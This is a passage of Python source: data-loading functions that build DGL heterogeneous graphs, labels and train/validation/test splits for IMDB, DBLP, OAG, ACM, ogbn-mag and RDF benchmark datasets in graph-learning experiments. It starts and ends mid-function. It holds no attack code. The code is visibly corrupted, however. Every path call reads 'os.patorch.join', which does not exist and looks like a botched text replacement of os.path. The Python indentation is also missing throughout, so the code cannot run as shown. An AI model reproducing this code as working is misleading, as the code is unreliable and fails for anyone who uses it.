sss = StratifiedShuffleSplit(n_splits=1, test_size=0.5, random_state=seed);
valid_index_temp, test_index_temp = next(sss.split(list(test_idx), np.array(labels)[test_idx]));
val_idx = np.array(test_idx)[valid_index_temp];
test_idx = np.array(test_idx)[test_index_temp];
train_idx = np.array(train_idx);
test_idx = np.array(test_idx);
val_idx = np.array(val_idx);
for ntype in G.ntypes:
if G.nodes[ntype].data.get("features", None) is not None:
G.nodes[ntype].data['h_f'] = G.nodes[ntype].data['features']
category='history'
num_classes=1
featless_node_types = ['brand', 'customer', 'chain', 'market', 'dept', 'category', 'company']
return train_idx,test_idx,val_idx,labels,G,category,num_classes,featless_node_types
def load_imdb_prexiang_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/imdb_data/xiang/"
# In[13]:
# load to cpu for very large graphs
file='dgl-neptune-dataset.pickle'
dataset=pickle.load(open(os.patorch.join(data_folder, file), "rb"))
G=dataset.g
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G=keep_frequent_motifs(G)
G=motif_distribution_to_zero_one(G,args)
print(sum(G.nodes[ntype].data['motifs']))
for ntype in dataset.features.keys():
G.nodes[ntype].data["h_f"]=dataset.features[ntype]
category = 'title'
train_idx, train_label = dataset.train_set[category]
val_idx, val_label = dataset.valid_set[category]
test_idx, test_label = dataset.test_set[category]
num_classes = len(list(dataset.labels.values())[0].label_map)
labels = torch.zeros((G.number_of_nodes(category), len(list(dataset.labels.values())[0].label_map)))
labels[train_idx] = train_label.float()
labels[val_idx] = val_label.float()
labels[test_idx] = test_label.float()
train_idx = np.array(train_idx)
test_idx = np.array(test_idx)
val_idx = np.array(val_idx)
featless_node_types = []
if args.use_clusterandrecover_loss:
for ntype in G.ntypes:
if G.nodes[ntype].data.get("h_f", None) is not None:
G.nodes[ntype].data['h_clusters']=compute_cluster_assignemnts(G.nodes[ntype].data['h_f'],cluster_number=args.num_clusters)
return train_idx,test_idx,val_idx,labels,G,category,num_classes,featless_node_types
def create_label_split(num_nodes,train_pct,val_pct=0.05):
tot=list(np.arange(num_nodes))
random.shuffle(tot)
train_idx=tot[:int(num_nodes*train_pct)]
val_idx = tot[int(num_nodes * train_pct):int(num_nodes * train_pct)+int(num_nodes * val_pct)]
test_idx = tot[int(num_nodes * train_pct)+int(num_nodes * val_pct):]
return (train_idx),(val_idx),(test_idx)
def load_imdb_kge_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/imdb_preprocessed/"
# In[13]:
# load to cpu for very large graphs
if args.few_shot:
edge_list = pickle.load(open(os.patorch.join(data_folder, 'k_shot_edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
else:
edge_list = pickle.load(open(os.patorch.join(data_folder, 'edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
if args.few_shot:
create_edge_graph_few_shot_splits_kge(G,data_folder,etype=['Drama_directed_by','directed_Drama'], K=args.k_shot_edge)
else:
create_edge_graph_splits_kge(G, 0.975-args.test_edge_split, 0.025,data_folder)
print(G)
return
def load_oag_kge_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
# In[13]:
# load to cpu for very large graphs
data_folder = "../data/oag/"
# In[13]:
# load to cpu for very large graphs
if args.few_shot:
edge_list = pickle.load(open(os.patorch.join(data_folder, 'k_shot_edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
else:
G = pickle.load(open(os.patorch.join(data_folder, 'graph.pickle'), "rb"))
create_edge_graph_splits_kge(G, 0.975-args.test_edge_split, 0.025,data_folder)
print(G)
return
def load_oag_na_kge_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
# In[13]:
# load to cpu for very large graphs
data_folder = "../data/oag_na/"
# In[13]:
# load to cpu for very large graphs
if args.few_shot:
edge_list = pickle.load(open(os.patorch.join(data_folder, 'k_shot_edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
else:
G = pickle.load(open(os.patorch.join(data_folder, 'graph_na.pickle'), "rb"))
create_edge_graph_splits_kge(G, 0.975-args.test_edge_split, 0.025,data_folder)
print(G)
return
def load_dblp_kge_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/dblp_preprocessed/"
# In[13]:
# load to cpu for very large graphs
if args.few_shot:
edge_list = pickle.load(open(os.patorch.join(data_folder, 'k_shot_edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
else:
edge_list = pickle.load(open(os.patorch.join(data_folder, 'edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
if args.few_shot:
create_edge_graph_few_shot_splits_kge(G,data_folder,etype=['writted_by_3','3_writes'], K=args.k_shot_edge)
else:
create_edge_graph_splits_kge(G, 0.975-args.test_edge_split, 0.025,data_folder)
print(G)
return
def load_dblp_few_edge_shot_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/dblp_preprocessed/"
# In[13]:
# load to cpu for very large graphs
edge_list = pickle.load(open(os.patorch.join(data_folder, 'k_shot_edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
features = pickle.load(open(os.patorch.join(data_folder, 'features.pickle'), "rb"))
for ntype in features.keys():
G.nodes[ntype].data['h_f'] = features[ntype]
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_few_shot_splits(G,data_folder,
etype=['writted_by_3','3_writes'],K=args.k_shot_edge)
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G = keep_frequent_motifs(G)
G = motif_distribution_to_zero_one(G, args)
for ntype in G.ntypes:
train_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
valid_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
test_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
metapaths = {}
if args.rw_supervision:
metapaths['actor'] = ['played', 'played_by'] * 2
metapaths['director'] = ['directed', 'directed_by'] * 2
metapaths['movie'] = ['played_by', 'played'] * 2
labels = pickle.load(open(os.patorch.join(data_folder, 'labels.pickle'), "rb"))
if args.splitpct is not None:
if args.splitpct==0.1:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx.npz')
train_idx = train_val_test_idx['train_idx']
val_idx = train_val_test_idx['val_idx']
test_idx = train_val_test_idx['test_idx']
else:
train_idx,val_idx,test_idx=create_label_split(labels.shape[0],args.splitpct)
else:
if args.k_fold > 0:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx_kfold-' + str(args.k_fold) + '.npz')
else:
if args.split == 5:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx005.npz')
else:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx.npz')
train_idx = train_val_test_idx['train_idx']
val_idx = train_val_test_idx['val_idx']
test_idx = train_val_test_idx['test_idx']
print(G)
print(labels)
train_idx = np.array(train_idx)
test_idx = np.array(test_idx)
val_idx = np.array(val_idx)
category = 'author'
num_classes = 4
if num_classes > 1:
labels_n = torch.zeros((np.shape(labels)[0], num_classes))
for i in range(np.shape(labels)[0]):
labels_n[i, int(labels[i])] = 1
else:
labels_n = labels
labels = labels_n
featless_node_types = ['conference']
if args.use_clusterandrecover_loss:
for ntype in G.ntypes:
if G.nodes[ntype].data.get("h_f", None) is not None:
G.nodes[ntype].data['h_clusters'] = compute_cluster_assignemnts(G.nodes[ntype].data['h_f'],
cluster_number=args.num_clusters)
train_g.nodes[ntype].data['h_clusters'] =G.nodes[ntype].data['h_clusters']
valid_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
test_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
return train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,metapaths,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_imdb_few_edge_shot_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/imdb_preprocessed/"
# In[13]:
# load to cpu for very large graphs
edge_list = pickle.load(open(os.patorch.join(data_folder, 'k_shot_edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
features = pickle.load(open(os.patorch.join(data_folder, 'features.pickle'), "rb"))
for ntype in features.keys():
G.nodes[ntype].data['h_f'] = features[ntype]
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_few_shot_splits(G,data_folder,
etype=['Drama_directed_by','directed_Drama'],K=args.k_shot_edge)
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G = keep_frequent_motifs(G)
G = motif_distribution_to_zero_one(G, args)
for ntype in G.ntypes:
train_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
valid_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
test_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
metapaths = {}
if args.rw_supervision:
metapaths['actor'] = ['played', 'played_by'] * 2
metapaths['director'] = ['directed', 'directed_by'] * 2
metapaths['movie'] = ['played_by', 'played'] * 2
labels = pickle.load(open(os.patorch.join(data_folder, 'labels.pickle'), "rb"))
if args.splitpct is not None:
if args.splitpct==0.1:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx.npz')
train_idx = train_val_test_idx['train_idx']
val_idx = train_val_test_idx['val_idx']
test_idx = train_val_test_idx['test_idx']
else:
train_idx,val_idx,test_idx=create_label_split(labels.shape[0],args.splitpct)
else:
if args.k_fold > 0:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx_kfold-' + str(args.k_fold) + '.npz')
else:
if args.split == 5:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx005.npz')
else:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx.npz')
train_idx = train_val_test_idx['train_idx']
val_idx = train_val_test_idx['val_idx']
test_idx = train_val_test_idx['test_idx']
print(G)
print(labels)
train_idx = np.array(train_idx)
test_idx = np.array(test_idx)
val_idx = np.array(val_idx)
category = 'movie'
num_classes = 3
if num_classes > 1:
labels_n = torch.zeros((np.shape(labels)[0], num_classes))
for i in range(np.shape(labels)[0]):
labels_n[i, int(labels[i])] = 1
else:
labels_n = labels
labels = labels_n
featless_node_types = []
if args.use_clusterandrecover_loss:
for ntype in G.ntypes:
if G.nodes[ntype].data.get("h_f", None) is not None:
G.nodes[ntype].data['h_clusters'] = compute_cluster_assignemnts(G.nodes[ntype].data['h_f'],
cluster_number=args.num_clusters)
train_g.nodes[ntype].data['h_clusters'] =G.nodes[ntype].data['h_clusters']
valid_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
test_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
return train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,metapaths,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_oag_univ_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/oag/"
# In[13]:
# load to cpu for very large graphs
if args.few_shot:
edge_list = pickle.load(open(os.patorch.join(data_folder, 'k_shot_edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
else:
G = pickle.load(open(os.patorch.join(data_folder, 'graph.pickle'), "rb"))
for ntype in G.ntypes:
if G.nodes[ntype].data.get("emb", None) is not None:
G.nodes[ntype].data['h_f'] = G.nodes[ntype].data['emb']
if args.few_shot:
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_few_shot_splits(G,data_folder,etype=['Drama_directed_by','directed_Drama'], K=args.k_shot_edge)
else:
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_graph_splits(G, 0.975-args.test_edge_split,
0.025,
data_folder)
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G = keep_frequent_motifs(G)
G = motif_distribution_to_zero_one(G, args)
for ntype in G.ntypes:
train_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
valid_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
test_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
metapaths = {}
if args.rw_supervision:
metapaths['actor'] = ['played', 'played_by'] * 2
metapaths['director'] = ['directed', 'directed_by'] * 2
metapaths['movie'] = ['played_by', 'played'] * 2
labels = pickle.load(open(os.patorch.join(data_folder, 'labels.pickle'), "rb"))
labels=labels.todense()
if args.splitpct is not None:
train_idx,val_idx,test_idx=create_label_split(labels.shape[0],args.splitpct)
else:
if args.k_fold > 0:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx_kfold-' + str(args.k_fold) + '.npz')
else:
if args.split == 5:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx005.npz')
else:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx.npz')
train_idx = train_val_test_idx['train_idx']
val_idx = train_val_test_idx['val_idx']
test_idx = train_val_test_idx['test_idx']
print(G)
print(labels)
train_idx = np.array(train_idx)
test_idx = np.array(test_idx)
val_idx = np.array(val_idx)
category = 'paper'
num_classes = 5
labels = torch.tensor(labels)
featless_node_types = ['author']
if args.use_clusterandrecover_loss:
for ntype in G.ntypes:
if G.nodes[ntype].data.get("h_f", None) is not None:
G.nodes[ntype].data['h_clusters'] = compute_cluster_assignemnts(G.nodes[ntype].data['h_f'],
cluster_number=args.num_clusters)
train_g.nodes[ntype].data['h_clusters'] =G.nodes[ntype].data['h_clusters']
valid_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
test_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
return train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,metapaths,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_oag_na_univ_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/oag_na/"
# In[13]:
# load to cpu for very large graphs
if args.few_shot:
edge_list = pickle.load(open(os.patorch.join(data_folder, 'k_shot_edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
else:
G = pickle.load(open(os.patorch.join(data_folder, 'graph_na.pickle'), "rb"))
for ntype in G.ntypes:
if G.nodes[ntype].data.get("emb", None) is not None:
G.nodes[ntype].data['h_f'] = G.nodes[ntype].data['emb']
if args.few_shot:
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_few_shot_splits(G,data_folder,etype=['Drama_directed_by','directed_Drama'], K=args.k_shot_edge)
else:
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_graph_splits(G, 0.975-args.test_edge_split,
0.025,
data_folder)
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G = keep_frequent_motifs(G)
G = motif_distribution_to_zero_one(G, args)
for ntype in G.ntypes:
train_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
valid_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
test_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
metapaths = {}
if args.rw_supervision:
metapaths['actor'] = ['played', 'played_by'] * 2
metapaths['director'] = ['directed', 'directed_by'] * 2
metapaths['movie'] = ['played_by', 'played'] * 2
labels = pickle.load(open(os.patorch.join(data_folder, 'labels.pickle'), "rb"))
labels=labels.todense()
if args.splitpct is not None:
train_idx,val_idx,test_idx=create_label_split(labels.shape[0],args.splitpct)
else:
if args.k_fold > 0:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx_kfold-' + str(args.k_fold) + '.npz')
else:
if args.split == 5:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx005.npz')
else:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx.npz')
train_idx = train_val_test_idx['train_idx']
val_idx = train_val_test_idx['val_idx']
test_idx = train_val_test_idx['test_idx']
print(G)
print(labels)
train_idx = np.array(train_idx)
test_idx = np.array(test_idx)
val_idx = np.array(val_idx)
category = 'paper'
num_classes = 5
labels = torch.tensor(labels)
featless_node_types = ['author']
if args.use_clusterandrecover_loss:
for ntype in G.ntypes:
if G.nodes[ntype].data.get("h_f", None) is not None:
G.nodes[ntype].data['h_clusters'] = compute_cluster_assignemnts(G.nodes[ntype].data['h_f'],
cluster_number=args.num_clusters)
train_g.nodes[ntype].data['h_clusters'] =G.nodes[ntype].data['h_clusters']
valid_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
test_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
return train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,metapaths,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_oag_full_univ_data(args):
#OAGData=OAGDataset.load()
#OAGData
return
def load_std_het_full_univ_data(args):
if args.dataset == 'aifb':
dataset = AIFBDataset()
elif args.dataset == 'mutag':
dataset = MUTAGDataset()
elif args.dataset == 'bgs':
dataset = BGSDataset()
elif args.dataset == 'am':
dataset = AMDataset()
else:
raise ValueError()
g = dataset[0]
category = dataset.predict_category
num_classes = dataset.num_classes
train_mask = g.nodes[category].data.pop('train_mask')
test_mask = g.nodes[category].data.pop('test_mask')
train_idx = torch.nonzero(train_mask, as_tuple=False).squeeze()
test_idx = torch.nonzero(test_mask, as_tuple=False).squeeze()
val_idx = train_idx
labels = g.nodes[category].data.pop('labels')
G = g
data_folder = "../data/"+args.dataset+"/"
metapaths = {}
if args.rw_supervision:
'''
TODO add metapaths
'''
use_default_split = True
if not use_default_split:
train_idx, val_idx, test_idx = create_label_split(labels.shape[0], args.splitpct, val_pct=0.00801)
print(G)
featless_node_types = []
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_graph_splits(G,
0.975 - args.test_edge_split,
0.025,
data_folder)
return train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, metapaths, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_ogbn_mag_full_univ_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
dataset = DglNodePropPredDataset(name=args.dataset)
split_idx = dataset.get_idx_split()
train_idx = split_idx["train"]['paper']
val_idx = split_idx["valid"]['paper']
test_idx = split_idx["test"]['paper']
hg_orig, labels = dataset[0]
subgs = {}
for etype in hg_orig.canonical_etypes:
u, v = hg_orig.all_edges(etype=etype)
subgs[etype] = (u, v)
subgs[(etype[2], 'rev-'+etype[1], etype[0])] = (v, u)
hg = dgl.heterograph(subgs)
hg.nodes['paper'].data['feat'] = hg_orig.nodes['paper'].data['feat']
labels = labels['paper'].squeeze()
num_rels = len(hg.canonical_etypes)
num_of_ntype = len(hg.ntypes)
num_classes = dataset.num_classes
category = 'paper'
print('Number of relations: {}'.format(num_rels))
print('Number of class: {}'.format(num_classes))
print('Number of train: {}'.format(len(train_idx)))
print('Number of valid: {}'.format(len(val_idx)))
print('Number of test: {}'.format(len(test_idx)))
#node_feats=[]
for ntype in hg.ntypes:
if len(hg.nodes[ntype].data) == 0:
x=0
#node_feats.append(None)
else:
assert len(hg.nodes[ntype].data) == 1
feat = hg.nodes[ntype].data.pop('feat')
hg.nodes[ntype].data['h_f']=feat
#node_feats.append(feat.share_memory_())
data_folder = "../data/ogbn-mag/"
G=hg
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_graph_splits(hg,
0.975 - args.test_edge_split,
0.025,
data_folder)
if args.use_node_motifs:
'''
TODO add motifs
'''
metapaths = {}
if args.rw_supervision:
'''
TODO add metapaths
'''
use_default_split=True
if not use_default_split:
train_idx, val_idx, test_idx = create_label_split(labels.shape[0], args.splitpct, val_pct=0.00801)
print(G)
print(labels)
train_idx = np.array(train_idx)
test_idx = np.array(test_idx)
val_idx = np.array(val_idx)
num_classes = 349
multilabel=False
if multilabel:
labels_n = torch.zeros((np.shape(labels)[0], num_classes))
for i in range(np.shape(labels)[0]):
labels_n[i, int(labels[i]) if int(labels[i]) < 6 else int(labels[i]) - 1] = 1
else:
labels_n = torch.tensor(labels)
labels = labels_n
featless_node_types = []
if args.use_clusterandrecover_loss:
for ntype in G.ntypes:
if G.nodes[ntype].data.get("h_f", None) is not None:
G.nodes[ntype].data['h_clusters'] = compute_cluster_assignemnts(G.nodes[ntype].data['h_f'],
cluster_number=args.num_clusters)
train_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
valid_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
test_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
return train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, metapaths, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_acm_univ_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
torch.manual_seed(0)
data_folder = '../data/acm/'
data_file_path = '../data/acm/ACM.mat'
data = scipy.io.loadmat(data_file_path)
G = dgl.heterograph({
('paper', 'written-by', 'author'): data['PvsA'].nonzero(),
('author', 'writing', 'paper'): data['PvsA'].transpose().nonzero(),
('paper', 'citing', 'paper'): data['PvsP'].nonzero(),
('paper', 'cited', 'paper'): data['PvsP'].transpose().nonzero(),
('paper', 'is-about', 'subject'): data['PvsL'].nonzero(),
('subject', 'has', 'paper'): data['PvsL'].transpose().nonzero(),
})
print(G)
pvc = data['PvsC'].tocsr()
p_selected = pvc.tocoo()
# generate labels
labels = pvc.indices
labels = torch.tensor(labels).long()
# generate train/val/test split
pid = p_selected.row
shuffle = np.random.permutation(pid)
train_idx = torch.tensor(shuffle[0:800]).long()
val_idx = torch.tensor(shuffle[800:900]).long()
test_idx = torch.tensor(shuffle[900:]).long()
for ntype in G.ntypes:
emb = torch.nn.Parameter(torch.Tensor(G.number_of_nodes(ntype), 256), requires_grad=False)
torch.nn.init.xavier_uniform_(emb)
G.nodes[ntype].data['h_f'] = emb
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_graph_splits(G,
0.975 - args.test_edge_split,
0.025,
data_folder)
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G = keep_frequent_motifs(G)
G = motif_distribution_to_zero_one(G, args)
for ntype in G.ntypes:
train_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
valid_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
test_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
metapaths = {}
if args.rw_supervision:
'''
TODO add metapaths
'''
train_idx, val_idx, test_idx = create_label_split(labels.shape[0], args.splitpct,val_pct=0.00801)
print(G)
print(labels)
train_idx = np.array(train_idx)
test_idx = np.array(test_idx)
val_idx = np.array(val_idx)
category = 'paper'
num_classes = 13
if num_classes > 1:
labels_n = torch.zeros((np.shape(labels)[0], num_classes))
for i in range(np.shape(labels)[0]):
labels_n[i, int(labels[i]) if int(labels[i]) < 6 else int(labels[i])-1] = 1
else:
labels_n = labels
labels = labels_n
num_classes=13
featless_node_types = []
if args.use_clusterandrecover_loss:
for ntype in G.ntypes:
if G.nodes[ntype].data.get("h_f", None) is not None:
G.nodes[ntype].data['h_clusters'] = compute_cluster_assignemnts(G.nodes[ntype].data['h_f'],
cluster_number=args.num_clusters)
train_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
valid_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
test_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
return train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, metapaths, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_imdb_univ_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/imdb_preprocessed/"
# In[13]:
# load to cpu for very large graphs
#if args.few_shot:
# edge_list = pickle.load(open(os.patorch.join(data_folder, 'k_shot_edge_list.pickle'), "rb"))
# G = dgl.heterograph(edge_list)
edge_list = pickle.load(open(os.patorch.join(data_folder, 'edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
features = pickle.load(open(os.patorch.join(data_folder, 'features.pickle'), "rb"))
for ntype in features.keys():
G.nodes[ntype].data['h_f'] = features[ntype]
#if args.few_shot:
# train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_few_shot_splits(G,data_folder,etype=['Drama_directed_by','directed_Drama'], K=args.k_shot_edge)
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_graph_splits(G, 0.975-args.test_edge_split,
0.025,
data_folder)
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
